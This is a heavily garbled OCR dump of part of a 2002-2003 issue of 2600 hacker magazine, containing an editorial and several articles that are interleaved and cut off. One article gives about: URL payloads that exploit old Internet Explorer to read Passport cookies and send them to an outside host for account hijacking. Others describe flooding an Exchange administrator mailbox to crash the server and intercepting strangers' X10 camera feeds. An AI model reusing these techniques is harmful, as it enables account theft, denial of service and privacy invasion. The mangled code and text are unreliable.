š¾ Archived View for clemat.is āŗ saccophore āŗ library āŗ ezines āŗ 2600 āŗ 2600_19-4_djvu.txt captured on 2022-01-08 at 14:16:40.
ā¬ ļø Previous capture (2021-12-03)
-=-=-=-=-=-=-
Volume Nineteen, Number Four
Winter 2002-2003,55.00 US.S7.15 CAN
"Voice or no voice, the people can always be brought
to the bidding of the leaders. That is easy. All you have
to do is tell them they are being attacked, and denounce
the peacemakers for lack of patriotism and exposing
the country to danger. It works the same in any country."
- Hermann Goering, Hitler's designated successor,
before being sentenced to death at the Nuremberg trials.
Editor-ln-Chie f
Emmanuel Goldstein
layout and Design
Shape Shifter
Cover Photo
Fur Harald & Erhard
Cover Design
Mike Essl
Office Manager
Tampruf
Writers; Berme S-, Billsf , Eric Corley,
Dalai, John Drake, Paul Estev,
Mr. French, Javaman, Joe630,
Kingpin, Lucky225, Kevin Mitnick,
mlc, The Prophet, David Ruderman,
Seraf, Silent Switchman,
Mr. Upsetter
Webmasters: Juintz, Kerry
Network Operations: mfc, Seraf
Broadcast Coordinators: Juintz, Pete,
daRonin, Digital Mercenary, Monarch,
w3rd, Gehenna
##?C Admins: Antipent, DaRonin,
Digital Mercenary, Redhackt, Roadie,
Setient, The Electronic Delinquent
Inspirational Music: Death in Vegas,
Good Courage, Tom Petty, Monoman,
Royal Trux, Holger Czukay, Space Ro-
bot Scientists
Shout Outs: Ed Hemstadt, LOcke, Tim
Pritlove, Tina, Zapphire
2600! ISSN 0749-385 1 ) is published
quarterly by 2600 Enterprises Inc.
7 Strong s tone, Setauket NY 11733.
Second class postage permit paid at
Seiauket. New York.
POSTMASTER:
Send address changes to
2600. P.0. Box 752. Middle Island.
NY 11953-0752.
Copyright (c) 2002
2600 Enterprises, Inc,
Yearly subscription: U S. and Canada -
S20 individual.
$50 corporate (U.S. funds).
Overseas - S30 individual.
S65 corporate.
Back issues available for 1984-200! at
S20 per year.
S25 per year overseas.
Indiv idual issues available from 1988 on
at 55 each. $6,25 each overseas.
ADDRESS ALL SUBSCRIPTION
CORRESPONDENCE TO:
2600 Subscription Dept.. PO. Box 752.
Middle Island. NY 11953-0752
(subs@2600.com). |
FOR LETTERS AND ARTICLE
SUBMISSIONS, WRITE TO: .
2600 Editorial Dept., P.0. Box 99. Middle
Island. NY 11953-0099
(letters@2600.com. aitieles@2600.com i
2600 Office Line: 631-751-2600
2600 FAX Line: 631- 474-2677
Material
p Positivity
-Passport Hacking Revisited
4
6
^-Lazy Exchange Admins
7
pWarspying
9
pCD Media Data Destruction
10
i-āHow to Make a DVD Backup
12
ā¢ Honeypots: Building the Better Hacker
15
[-DNS Redirection Stopped
16
[ā¢'More on Telemarketing
18
p Cracking Voter Fraud
20
pLinux on the Xbox
21
pRemoving Spyware and Adware
23 I
| Exposing the Coin star Network
25
pA Dumpster Diving Treasure
26
[-DMCA vs. DMCRA
27
p Letters
30
r~.ncsc.mil (144.51.x.x)
40
A Brief Introduction to Oeepfreeze
46
Beating Download Manager Protection
53 '
[-DHCP is Your Friend!
54
p Marketplace
56
L -ā Meetings
58
In the fast paced culture that we seem to find
ourselves caught in the middle of, it's very easy
to get stuck in a default mood of euphoria or de-
spair Lately it seems that we've been despairing
quite a bit. We're certainly not alone.
While it's very important to not lose sight of
the bad and ominous things that are happening
m the world of technology and what it could do
to people like us, nothing is gained if we lose
our overall positive outlook. We certainly
couldn't have kept on publishing for nearly
twenty years if we didnāt feel a strong sense of
hope for the future.
There will never be a shortage of negative
issues to focus upon. Let's take a brief moment
to look at the positive developments.
By the time you read this (and hopefully bar-
ring any last minute unfortunate circum-
stances), the excruciatingly long ordeal of
Kevin Mitnick will have finally reached an end.
January 20, 2003 w as the date that Mitnickās su-
pervised release came to an end - three years af-
ter his release from prison. That means that he
will once again be able to use the Internet, travel
without having to ask permission, and talk to
anyone he wishes to without having to check to
see if they've ever been convicted of a crime.
Most oi us take these freedoms for granted so
itās hard lo even imagine what life must be like
without them.
In these past three years. Milnick has be-
come a model for someone who can overcome
adversity and triumph in the end. Despite five
years of isolation and the aforementioned re-
strictive conditions upon his release, he refused
to lei the system defeat him. The authorities
made it almost impossible for him to earn a liv-
ing - insisting that he not be allowed anywhere
near a computer and atone point suggesting that
he pursue a career in fast food. Instead Mitnick
landed a job at a major talk radio station and an-
swered listener questions about technology. He
had kept himself educated on all the technologi-
cal advances, despite being incarcerated and
forbidden from experimenting with them upon
his release. More recently he had a book pub-
lished on the intricacies of social engineering
and wem on a government-approved speaking
tour to promote it. Throughout this, Mitnick
found time to testify before a Senate subcom-
mittee on the dangers of bad technology and un
informed people. He also provided key
evidence in a case against Sprint who had the
audacity to claim that their switches were
uohackable.
It would have been easy to dwell on the neg-
ative in this case - and there certainly was in>
shortage of negativity. After all, Mitnick hadnāt
actually had a real day of freedom since 3988
meaning that when all is said and done, fifteen
years will have gone by since this ah started.
And in all that lime, there was never a charge
filed against Mitnick of anything more substan-
tial than making free phone calls and looking at
source code that didn't belong to him. It w as all
ail incredible waste of time. But we get nowhere
by letting our bitterness dictate how we live. We
have everything to gain by continuing forward
in our spirit of curiosity, education, and
rebellion against conformity.
There's always a price to pay in order to take
those steps and sometimes it's a heavy price.
Dmitry Sklyarov spent Lime in an American
prison and was unable to return to his native
Russia for nearly six months - simply because
be wrote a program that could be* used in a way
that violated the absurd Digital Millennium
Copyright Act. ft made no difference that he
wrote the program in another country. Even
Adobe, the company that originally pressed
charges against Sklyarov, realized how ridicu-
lous the whole thing was and tried to drop it.
But it was too late and the American justice sys-
tem wen! to work, eventually putting Sklyarov's
company (Elcomsoft) on trial instead in ex-
change for his testimony. The authorities didn't
count on the defendants putting on a strong fight
and they didn't count on the massive show of
support for Sklyarov.
There's a reason so few cases ever make it to
a jury. People are rightfully terrified of the sys
tern and what it can do to them. It s ironic that ii
took someone from outside our country to stand
up to the system and refuse to be intimidated.
The trial took place m December and it only
took the jury one day to rule in Sklyarov's and
Elcomsoft's favor.
Page 4
2600 Magazine
Part of the DMCA stipulates that there has to
he intent and this was something the jury w'as
unable to hnd in this case. It doesn't address the
overall stupidity of the law itself which means
there will be more such cases. But itās a good
sian and a significant step towards fixing the
numerous problems caused by this horrible leg-
islation, And most importantly, it's proof I hat
determination and standing by one s convictions
can ultimately lead to victory.
We have to also remember that there's a big
world out there, one that doesn't always initially
grasp the importance of the issues we value. It's
easy to dismiss the general public as ignorant
and pawns of the mass media. But. as in all
things, the truth is never quite that simple. The
general public can get it, they do tend to value
the things that we do, and they are most defi-
nitely not the enemy, fhe jury in the Elcomsoft
case is living proof of this. The key is getting
the message out.
Over the pasL year or so we've reported
(along with many others) some of the really bad
ideas that have been passed down from Capitol
Hill as a "response" to terrorism - things like the
Patriot Act, the Homeland Security color
scheme, Operation TIPS, Total Information
Awareness, etc. And while many of these things
are still around, public awareness and public
criticism has soared - and itās most definitely
made a difference.
People are taking more time to think these
things through and more of them seem to be re-
alizing that diminishing our freedoms really is-
n't going to accomplish a whole lot - other Than
diminishing our freedoms, Weve seen less talk
of the alert siatus color coding system as it
becomes mocked more than itās used.
The TIPS system was heavily criticized for
its Stasi-like system of informing on ones
neighbors and having untrained civilians prowl-
ing around looking for potential though tcri me.
And in true Orwellian style, all mention of TIPS
was removed from the citizcncorps.gov website
where it had been prominently featured. It never
happened.
The Total Information Awareness initiative
is still very much with us. In their own words,
TIA is meant to be a "total re invention of tech-
nologies for storing and accessing informa-
tion... although database size will no longer be
measured in the traditional sense, the amounts
of data that will need to be stored and accessed
will be unprecedented, measured in petabytes."
All of this will supposedly identify terrorists by
having every conceivable bit of data easily
available - from medical records to credit card
purchases to Internet activity. It doesn't take
much lo figure out that since they donāt know
who the terrorists are they will have to scruti-
nize all of us using these yet to he invented
tools. It's clearly a sensitive topic lor the folks at
Defense Advanced Research Projects Agency
(DARPA) who wonāt even reveal how much
money is being allocated for this. While public
pressure lias yet to kilt this beast, its probably
one of the few things I hat can. Public ridicule
has already put an end lo the TIA logo - a pyra-
mid with an all seeing eye within it, apparently
looking out over the globe. That also never
happened.
As wc go to press, yet another monitoring
plan is being announced - this time one that
makes Carnivore look friendly. It s part of a re-
port entitled Tl Fhe National Strategy to Secure
Cyberspace" and it would require Internet Ser-
vice Providers to participate in a centralized
system that would theoretically allow the entire
Internet to be monitored along with its users.
The apparent frustration the government is feel-
ing is summed up in this statement by one of the
planās coordinators: "We donā! have anybody
that is able to look at the enti re picture. When
something is happening, we don'i know it s hap-
pening until ifs lex) late.ā That is why the plan
will fail. What they want is not only impossible
but it flies in the face of everything Lhe net rep-
resents. ll would be the equivalent of wiretap-
ping everyone at all times and we suspect most
people just arenāt going to go for that. Expect a
backlash on this like nothing we've ever seen -
if this scheme even makes it to spring.
Absurd and ridiculous as some of these
plans may be, itās no excuse for not remaining
vigilant and fighting those who endanger our
freedom. Our victories may appear to be few
and far between but they are quite significant
As is the fact that none of them could have been
accomplished without a degree of organization
and activism. Whether the cause is ending the
suffering of a single person, overturning a really
bad law T or preserving everyoneās right to pri-
vacy, reaching out to like-minded individuals
and helping to make it a major issue is critical.
It s gotten us this far and it will continue to be
our strongest weapon.
Winter 2002-2003
Page 5
by Chris Shiflett
ch r is @ shifletLo r g
This article is a follow-up article to 41 Pass-
port Hacking," an article published in 18:3.
Much of the information here is given under
the assumption that you are familiar with the
original article, so you should read it first. The
original article was the first to reveal the secu-
rity vulnerability in Microsoft Passport that
prompted Microsoft to discontinue the Passport
service for a short period of time while im-
provements were made. Other articles have ap-
peared since the original, and U has been
translated into several different languages, Un-
fortunately, the Passport mechanism possesses
the same fundamental flaws that it did when the
original article was written, though attempts
have been made to mitigate these risks by im-
posing shorter timeout periods and requiring
users to re-authenticate themselves more often.
Background
In "Passport Hacking," I introduced the Mi-
crosoft Passport mechanism and its inherent in-
security characterised by a complete
dependence on cookies. Though cookies can be
an adequate means of maintaining state in
HI TP transactions, they are a poor choice for
user authentication. Using cookies and URL
variables, Microsoft communicates with Pass-
port enabled sites through the user alone; there
is no server to server communication. This is
the fundamental design flaw that exposes Pass-
port users to all of the security vulnerabilities
that have been published to date.
Hie vulnerability used to compromise a
Passport account in i he original article involved
using a malformed URL to expose a users
cookies to an unauthorized website. This vul-
nerability only existed in Microsoft InLernet
Explorer versions 4,0 - 5.0, so this technique
could not be used to compromise the Passport
account of people using Internet Explorer ver-
sions 5,5 and 6,0. This article will demonstrate
a technique (hat can be used to compromise the
accounts of people who use these newer ver-
sions of Internet Explorer and will direct Inter-
net Explorer users to the patch that will fix this
vulnerability.
The Vulnerability
The vulnerability that exists in Internet Ex-
plorer versions 5.5 and 6,0 was originally a I
luded to on the web at http://www. solution s-
. li/i nde x .eg i/ new s _ 200 1 _ 1 1 _08 ?l ang =eng , I a
order for a website to gain unauthorized access
to a user's cookies, an about: URL is used to de-
ceive the web browser so that h executes client-
side scripts in the local context with regards to
security restrictions. Thus, a client-side script
can potentially have as much access to your
computer as you do.
An example of a URL exploiting this vul- I
nerability is the following;
ah* >u t ://<sc ri pt %20 lung a a gc= j a vascri pt >a I ert( Th i s
% 20brow ser% 2()i 20v u I neru hie / )</script> |
A vulnerable browser will execute this
client-side script, which will display the fol-
lowing alert box:
The significance of this is more extreme
than this example illustrates. Because Internet
Explorer executes this client -side script in the
local context, this script has fewer security re-
strict ions than client-side scripts that Internet
Explorer believes to be sent from a remote web
server In addition, we can make a simple mod-
ification to our URL to make the domain cheek-
ing mechanism in Internet Explorer mistake the
URL for one from any domain we choose when
it checks for cookie restrictions. For example:
abou t :// w w w. pas s pt m .Co m/<sc r i pt% 201 a ngtiuge -j
a va sc ri pt>a 1 e rt t doc u mem coo k t e K/sc ri pt>
If you are currently logged into Microsoft
Passport when visiting this URL, an alert box
similar to the follow ing will appear:
Page 6
2600 Magazine
A
MSPPreĀ«p3Ā£SPD[t@k3ab^ orq. Browse*! est Success?;
MSRAuth*5T CH 22BZXDFSwY7!1 CE iq5B i?aM tĀ£ 1 TW^SHNBqVAtvsWFWbOC&^na* J S wlwG tarvM aSSfl^JpOX vqpfc
FStTdbhQtft
MSPProtĀ»5T CH 22BZXB' WQ zkqrnJ bOeIXE sQtnriQ T araQJ qQ iqiARjAVT 0 vM mTM hKQflZRomtXvUZSVLO KWtJl Ā£pl3
Dei pHblBY gi3J pJ F'pB zD xvJwdoSV.tMS ei.Vf 3taU L ghgSByez? OqpZpD' WN [pvv4i*FHkfl5M' voSNzuvKIi KJ U Xril IE qflgYoZk
% MSPVĀ»*3
All cookies that would be made available to a
server-side script in the www, passport.com do-
main will appear in the alert box. The signi he a nee
of this example is that we now have a technique
for executing a client- side script that has access to
any cookies from any domain we choose. When
combined with Passports complete dependence
on cookies, the danger should be clear.
The Compromise
The only step remaining fora complete com-
promise is to establish a method to gel the cook-
ies sent to the web server where they can be
stored and subsequently retrieved by the im-
poster, To do this, I w ill use a URl similar to the
last example, except that the script will redirect
the user to a remote URL and append the cookie
data in the query siring of that URL:
a bou t ://ww w. passport , c o n i/<scri pi L 201 an
g uage=ja vase ri pt>doc u men t doc at i o n='http : //shi -
flett.org/de mos/passport_h acking_re v is ited/?coo
ktes=ā+docu meni.cookie</scri pt>
The most dangerous Characteristic of this
technique is that no interaction from the user is
required. Because of this characteristic, an at-
tacker canned inect the user through many URLs
that will compromise the cookies from many dif-
ferent domains rather than just one. This makes
Internet Explorer versions 5.5 and 6.0 even more
dangerous than the previous versions with re-
gards to cookies, hi addition, tins compromise is
even easier to achieve than the original, requiring
very little expertise on the part of the attacker.
Once the cookies are stored on the web server.
a technique must be established to store these
cookies on an imposter's web browser. Many
methods can be utilized for this step, and the orig-
inal article gives sample code for one. This Itnal
step will complete the impersonation, and the im-
poster can then pose as the user whose account
was compromised by visiting any Passport
enabled website.
Summary
Due to the fundamental Haws in the design of
the Passport mechanism, I do not recommend that
it be used in conjunction with sensitive data os
personal information. The convenience is not
worth the security riskv and it is likely that this
article does not represent the last of such risks. As
1 mentioned earlier, the mechanism used is fun-
damentally flawed; articles such aa this merely
describe techniques that can be used to exploit
these Haws,
For those who are currently using a vulnerable
Web browser and wish to continue to use it. visit
hltp://www,microsoft. com/window s/ieAlo wn -
loads/critieal/q3 1 3675/defauU.asp and install the
Security patch. There are many websites that uti-
lize cookies in order to maintain state, and using a
vulnerable browser places you at risk of many at-
tacks similar to the one described here.
An interactive demonstration of the technique
described in this article is located at lutp://shi-
flett.org/de i n o s/ pas s port_hac ki ng _re v is i ted/ .
Lazy Exchange admins
by ddShelby
Security in Exchange is or should be a con-
cern for many admins out there because of its
fairly widespread use in many small to mid sized
organizations. It does have some worthy Features
but also has some serious security concerns ( like
everything from Redmond J that need to be at-
tended to. And that is the purpose of this article.
To inform and educate those who read it and
maybe expose a few Exchange admins to some
information they might lind useful. So let's get
started.
As an admin you have the ability to create an
account during install that is not the same as the
default administrator account in the OS, But not
many elect to do this because of the log on/log off
hassle to administer the OS along with a separate
account to administer Exchange, If a separate Ex-
change admin account was not created at the time
of install (which is almost always the case) and
itās an NT4 server, then it's almost guaranteed that
adminislrator@whoever.com exists, because you
can't rename the administrator account for the OS
in NT, If it's a Win2K server with Exchange 5.5
Winter 2002-2003
Page 7
or Exchange 2000, the same is also true. But with
the ability to rename the default administrator ac-
count iii die OS, there is a chance it was renamed
at the time ot setup. In both cases (assuming de-
fault! the administrator account for the OS has an
SMTP address that follows the convention: ad-
ministrator^ 1 whoever.com, If the OS is NT4.
then it's a shoe- in unless the SM TP settings were
edited by the admin. This is the problem.
Some Basics of Exchange
The standard version of Exchange 5.5 and
2000 both have a limit on the size of either the
public or private database tpriv.edb and pub.edb).
They cannot exceed 16 GB each, t he Enterprise
versions of 5.5 and 2000 tire not limited to any-
thing except available drive space. With server
drive space still somewhat costly (assuming the
server runs with some form of SCSI and raid),
reaching this limit is not difficult for most organi-
zations of a dozen users or more. Two reasons
why ifs so easy to get to 16 GB or reach the
servers available drive space limit is the disre-
gard of most admins towards limiting users' mail-
box size and the users' habit of using Outlook
deleted items folder as an archive folder. The ad-
min has Lhe ability to force notification limits on
users' mailbox size on either a global or per user
basis, l he spam issue is also partly to blame since
everyone just deletes it, but the mentality of using
the deleted items folder as an archive comes back
to haunt again* only adding lo the total size of the
database. So the 16 GB limit is in many cases
closer than one might think. This is especially
true if none of the limits were ever put in place
and the server has been in use for a year or longer.
It's made worse by Lhe fact that small organiza-
tions don't need a monster server to run Exchange
5.5 and with the hardware requirements set forth
by Win2K server* many have elected to stay with
NT4 and Exchange 5,5, An NT4/Exdmnge 5,5
server could easily serve a dozen users on a F200
with 32 megs of ram and a single 10 GB IDE
drive. Don't laugh. I ve seen it.
Gening back to the point* Any Exchange
server is vulnerable to getting swamped and not
by some new hack. You can crash Exchange by
simply knowing any e-mail address of any recipi-
ent on any given server. The ugly part is this
could potentially happen over days or weeks or
even months before it's even noticed or it's just
too late. Since Exchange by default has an ac-
count assigned to the Administrator of the OS, an
SM T P address exists for it. If you assume that the
administrator account is not actually in use but
still exists* one could theoretically swamp an Ex-
change server by sending numerous e-mails with
large bogus attachments. Or if the sender's ISP
does not impose limits on the size of outgoing
mail, one large attachment could do the same. To
use any general user's address is slightly more
difficult since users usually read their mail. But
the administrator account is almost never used
since admins set up an address for themselves an !
use it instead.
As drive space comes close to zero available,
the Exchange service that handles SMTP (IMS)
shuts down and all incoming mail is rejected, Bui
since the information store service (the database)
usually continues to run, and if the admin is smart
enough to check the private information store
listed in Exchange Admin, he would see the
tremendous size of the mailbox and then just log
into it and clean it out. An easy fix for Lhls is to
just edit the SMTP address of the administrator
account to something ohscure* In addition, you
could disable any unused SMTP addresses to help
prevent getting swamped. A periodic check of
available drive space or the size of (he .edb files
would be useful, but seems to escape many
admins.
But Wait, It Gets Worse
As opposed to reaching the drive space limit,
il the 16GB database limit is reached instead, it
becomes a whole different story* If the Enterprise
version is installed before the 16 GB limit is
reached* then disaster can be avoided* However,
d the 16GB limit is reached before upgrading, the
information store service is shut down automati-
cally and can't be restarted The result from this
is all incoming SMTP messages are rejected at
the server and no user can log in to their respec-
tive mailbox. And lhe admin can't get the service
started to log in and delete the offending content.
As an admin you can purchase the Enterprise edi-
tion for two grand* hut installing it on top of lhe
standard edition doesn't quite solve the problem
All is not lost - there is a workaround for this
listed in the Knowledge Base that explains how to
copy the database into the active folder (usually
exchsrvAM DBDATA) after you install the Enter-
prise version. But if lhe database has reached the
16GB limit you'll be copying for a while. If the
admin is savvy enough, he could play the game of
just renaming folders instead of copying. But
with so many Windows admins who changed ca-
reers from grocery bagging, it's unlikely they're
smart enough to figure that out. And as the
Knowledge Base article suggests to copy the edb
file* it seems to me that at least one employee at
Redmond didn't figure it out either. Admins could
also defrag the database with a utility included
with Exchange in the exchsrvr\bid folder called
eseutil (both 5*5 and 2000). This would buy
enough time to delete enough and recover. But il
the SMTP service IMS is running and email rs
still incoming, it could be a race to delete before it
2600 Magazine
reaches its limit again. In addition, Lhe delrag
needs drive space equal lo or greater than the size
of the database* But this inevitably brings me
back to admins who were bagging groceries six
months ago. Another safety net would be to im-
plement a second MX record for the domain with
a higher cost route, so any incoming mail rejected
by Exchange would be collected on another ma-
chine. Then with ETRN you could dequeue the
mail from Lhe higher cost server and no mail
would be lost.
Discovery of a Server
Regardless of the presence of a firewall, by
using one of the many port scanners an Exchange
by Particle Bored
Are you having a hard time figuring out what
to do wiLh your X 1 0 camera now dial you are
done playing practical jokes on friends and fam-
ily? For less than $50 you can pul the X10 re-
ceiver in your car and begin screwing around
with complete strangers*
Standard disclaimer: I don't accept responsi-
bility for my own actions* so l definitely won t as-
sume responsibility for yours, If TVs in vehicles
are illegal in your area, or should you get decapi-
tated from a TV Hying around in your ear it's your
problem.
Here is what you will need to get started:
Jensen J53-RW TV/Monitor (only $25 at Target)
KI0 Receiver
DC Power cord with "f," connector
DC Power "Y r adapter
Velcro
The Jensen TV is a 5" black and white
portable monitor that has both video and audio
RCA input jacks. It can run on AC* DC, or batter-
ies and comes w ilh a car lighter adapter.
The X 1 0 receiver is intended for indoor use,
so it is shipped with only an AC adapter. If you
look at the output of the adapter though, you'll see
that it is 12 volt i >C which means you can run the
receiver straight off your car battery. Since 1
wanted the system to he easily removed, I de-
cided to power it with another lighter cord (the
one with the "L" connector). It is positive- tipped,
so make sure you have the polarity right*
Now plug everything together* Nearly all of
the connectors can only go in one place. The
RCA connectors are fully color-coded, so if you
Winter 2002-2003
Win2K laptop but many oLhers work just the
same, A scan of a range of addresses to port 25
will eventually reveal an open port. If it's an Ex-
change server it will identify itself as such* as
well as the version and build. For example, 25
S M fit ' 220 sc rve r. do ma i n . w hoe ver. co m HS M T P
Server (Microsoft Exchange Internet Mail Ser-
vice 5*5.2653.13) ready. In this example it's a 5.5
SP4 server. With that, the domain is known* the
administrator address can be correctly assumed
95 percent of the time or belter, and the rest is up
to any delinquent with nothing better to do. Or at
some point some worm will make its way to the
Internet and play this same game, only faster*
can't figure out how to do it, lire up the IM client
on your Mac and ask your grandmother.
I mounted the monitor and receiver on my
dashboard with Velcro. If this method obstructs
your view you can put the monitor on the passen-
ger scat or floor. Make sure you don't mount any-
thing where it might hinder the deployment of an
airbag.
Now hit the road. 1 found my first camera
within 61) seconds on the very next block. 1
typically find one about every 15 minutes.
In closing here are a few things I learned the
first day:
- Don't worry about the channel switch on
your receiver - most folks leave it on the default
channel "Aā\
- The transmitters have a range of only around
100 yards so you w ill need to be somewhat dose
to your target.
- You'll lend to get audio before video* so
you'll know you are onto something when the sta-
tic on Lhe TV goes away* Keep your eyes tin the
road and pull over when you start receiving
audio,
- You'll notice several definite patterns appear
on the monitor at times* For example, I have seen
both narrow and wide horizontal lines* If you
identify the devices that cause them* write to the
Letters section of 2600 and let everyone know. 1
would bet one of them is a 2*4 GHz cordless
phone,.*,
- I was able to get perfect cable TV twice. Is
someone using wireless for extensions or
something?
server is easy Lo find, i use Super Scan on my
Page 8
Page 9
by Gr3y I0qu3
gr ey loq ue @ pa l a d indesi gn ,ca
While we as hackers have an obsession wilh
freedom of speech we also have an obsession
with dal a de struct ion. 1 wrote this article to quell
my - and many other peoples' - interest in the lat-
ter specifically dealing with CDs, I've heard
nuking the CD in a microwave is not MX) percent
successful in destroying the data 11 was stated in
"How to Hack From a Ram Disk" in 18:4. I tried
to find information on this topic but there really
is none out there, so 1 decided to take this task on
for myself.
When 1 started doing research for this article J
realized that there are many ways to destroy CD-
ROM. CD-R* and CD-RW media. The first
things l found were targeted towards commercial
uses, I found products that used "micro indenta-
tion H " to "reliably penetrate the data surface of
target media, destroying any readable daia" and
as a side effect the CD went from round to an
oval shape Sure sounds good, right? Well if you
have $5k to waste itās great. Then there's some
i hat grind away the recording surface. The one I
found cost $1GL Both of these solutions are not
priced for the average person. Simply deleting
the filev from a CD-RGM/R/RW won't work ei-
i her, There are plenty of software suites out ihere
for recovering data from them. 1 found one for
$39,95 and there was even a free 30 day trial. So
if you have a low tech adversary you're hiding
the data from even that wouldn't work. The soft-
ware can also recover data from quick formatted
CD-RWs, where the data is left there just to be
overwritten at a laier time (the same concept as
recovering deleted data from your hand drive -
the reference to the data in the drive table is re-
moved. the data isn't touched). Let's gel to ihe
main point of the article: Does data destruction
with a microwave really work?
First, to understand if the microwave is an ef-
fective way to destroy data you need to under-
siand how CDs are made. All three types of CD
f C D - RO M * CD- R, a n d CD- Rā W ) are d i IT ere ni. In
the next little while I'm going to look al the three
different types and explore if it will work for
each.
CD-ROMs are exactly what they say, CDs
with Read Only Memory, Most of a CD-ROM
consists of a piece of dear polycarbonate plastic.
During manufacturing, this plastic is impressed
with microscopic pits arranged as a single, con-
tinuous, extremely long spiral track of data. Once
the plastic is formed, a thin, reflective aluminum
layer is 'sputtered" onto the disc* covering the
bumps. Then a thin acrylic layer is sprayed over
the aluminum to protect it. A CD reader reads
CD-ROMs by sending out a laser beam that
passes through the plastic layer, reflects oft the
aluminum layer and hits a device dial detects
changes in the amount of light it receives, I he
bumps, commonly called pits because if you
could see them they would look like pits from the
label side of the CD-ROM, reflect the light dif-
ferently from ihe lands. The lands arc ihe rest of
the aluminum layer. The aluminum layer is very,
very thin* When you nuke a disk, large currents
flow through ihe aluminum, These currents pro-
duce enough heat to vaporize the aluminum. You
then see a very small lightning storm as electric
arcs go through the vaporized aluminum. There
will be many paths left etched through the alu-
minum after this. So with the aluminum vapor-
ized a CD player won't be able lo read the data
anymore. Because of the extreme heat of the alu
milium the plastic above and below the alu-
minum would also be damaged. I'd he guessing
the aluminum paths left would be horribly
warped. Just think about what w r ould happen to
you if you were subjected to l hat kind of heal
I'm fairly confident that this is a 100 percent se-
cure method of data destruction as you would nul
be able to somehow inject a new reflective mate-
rial and fill up i lie microscopic pics as they would
he damaged. Sure, l hat's all great if you happen
to have a Wrndoze CD silling around that you
don't w ? ant anyone to have to experience the
horror of.
So what about CD-Rs? Instead of ihere being,
pits imprinted into the plastic of a CD-R there is
an extra layer. This extra layer is a greenish dye
righi below the reflective material. A write laser
heats up the dye layer enough to make it opaque.
The read laser in a CD player senses the differ-
ence between dear dve and opaque dye the sami
way it senses bumps - it picks up on the diffei
ence in reflectivity. So when you nuke a CD-R
the gold/aluminum layer vaporizes. If that is flic
only effect then it would be possible to cut the
CD where the aluminum/ gold layer used to lx*
and then put a reflective substance on top of it
and stick it in a CD player. This would require
Page 10
2600 Magazine
very, very fine instruments as a CD is only
1.2mm thick. But the main variable is how hot
the aluminum/gold is w hen it vaporizes and if it
is hot enough to change the state the dye is in -
from transparent to making the whole disk
opaque to a reader. From looking at a few nuked
CD-Rs t think that most data would be lost. On a
blank CD that is nuked, there is a "loose swirly 1 '
pattern of the different shades {written and un-
written ), effectively making true data impossible
to find. On CDs with data it would do the same
and so a lot oJ data would lx 1 lost. So on CD-Rs
it's not really a guaranteed process of having
your data fully and completely removed. Al-
though if you're up against someone like the
NSA/FBI/C1A who are going to all ihe trouble to
find that information you have far bigger prob-
lems on your hands and I'm guessing you'd never
see a public court,
CD-RWs are a little different again. Instead
of the dye layer there's a phase-change com-
pound composed of silver, indium, antimony,
and tellurium. This recording layer is sand-
wiched between dielectric layers that draw ex-
cess heat from the phase-change layer during the
writing process, A CD-RW drive has to use three
different lasers: a read laser, a write laser, and an
erase laser. To write to a CD a laser beam heats
areas of the phase-change material above the
melting temperature (50O-70OC). so all the atoms
in Lhis area can move rapidly into a liquid stale.
I hen, j I cooled quickly enough, the random liq-
uid slate docs not reorder its atoms back into a
crystalline state. To erase, a laser heats the same
area to above the crystallization point - 200C -
and then lets it cool quickly so that the atoms re-
order themselves. The read laser is much less
powerful The dielectric layers that are above and
below the phase-change compound are by defini-
tion "poor conductors of electricity and w ill sus-
tain the force of an electric field passing through
it." So that would not allow much of the electric
field caused by the microwave to be able to reach
the phase-change compound layer where the data
is stored. Bui then again, it's riot made to stand
the bombardment by a microwave. Also, its a
heal insulator so the temperatures caused by the
reflective layer vaporizing will not affect it too
much either. So again with advanced tools it
mighL be possible to remove the damaged
material and put on a new reflective layer.
Unfortunately I have no way to find this out
for sure. 1 would like someone to write a follow-
up to this article with actual Lab data (Univer-
sity). As you can see it is not known if
microwaving is a 100 percent secure form of data
removal tor CD-Rs and RWs. Il is one of the
most secure options ihere is. It should hold up
unless you have POTUS (President of the United
Stales) really pissed off at you. Local police
agencies and the FBI probably do not have the
technology to retrieve daLH from a nuked CD.
Most of the people who argue that this is possible
also argue that "they" would just go back in time
to before you nuked the CD....
Greetz: Spiff y and Syphet:
BANKRUPTCY SERVICES U.C. AS
CUSP AGENT FOR PSINET LIQUIDATING LLC
HSBC BANK USA
NEWVQHK. NY IDOE?
MDflOtO
1103
CHECK NO,
āiifee Dcdlr'Pli 12 Cents
PAY
TOTH*
ORDER
OF
5383KET
PGBOXMfl
WiDC-E ISLAND W T1SSJ
ā”ATE
Tirol
AMOUNT
SL3 12
HO n l^Fj p '1 ! 5J ii\T LJ F' :
CO e iOO kOBfli: Ol2BOU75^
Some of you may remember a problem we had with a company called PS I back in 1995. To put it
briefly, we were misled into signing a contract for ISDN service that didn't exist arid almost lost a
sizable down payment Once we publicized the situation and stuck audio evidence of their deceit
on our website, we got a refund in full. More recently, PS! went bankrupt (and no, we don't feel
guilty). For some reason we wound up on their list of creditors and eventually received this check*
They also managed to rename us from 2600 to 5393* We doiTt really understand any of it but if
this is how they ran things, we may understand how they went bust.
Winter 2002-2003
Page 11
r
How to Make a DVDfi
by Maniac Dan
Disclaimer: Copying DVDs to sell or DVDs
you &o not own is illegal and immoral and
should not be done .
After reading the letter in 19:3 questioning
the methods of DVD copying, l decided to write
an article detailing exactly how it's done, or at
least get it close enough for normal people to
make backups of their DVDs, I've only tested
this on Region l NTSC DVDs. Readers in other
countries should find a guide for their region
and video formal. Sorry. 1 also find it useful to
bring a stack of VCDs w ith rue on trips, since
my laptop dt^sn't have DVD capabilities. Any-
way, I'm going to detail the methods for ripping
to either AVI, VCD. or SVCD. Some of the
steps are the same, hut for steps that are differ-
ent, I will assign them both a number and a let-
ter. so 3(A) is the AVI instructions, 3(V) is
VCD, and 3(S) is SVCD. Any step that applies
to all three formats wall have no letters. In order
to rip to AVI, you need Smart ripper and
DVD2AVL To rip to VCD and SVCD, you need
these files plus TMpgEne and BEJMpeg. Also,
for the ripping process to work on XP or some
versions of 2K, you need a valid aspi layer dri-
ver. To bum your CDs you need soil ware that
supports VCD and SVCD burning, like Nero.
(Links for these programs are the end of this ar-
ticled Now for the steps:
I: Insert the DVD and play it for a few sec-
onds in a software DVD player. This will "un-
lock" the DVD and allow you to rip it using
Sniartripper.
2: Load up Sniartripper and take a look
around. At the bottom of the screen is a "Target"
box which needs to be filled in with a valid
folder name. The rest of the first page is chapter
selection for if you only want to rip certain
scenes (like Monty Python sketches). The sec-
ond tab is called "Stream Processing" and al-
lows you to select the languages and special
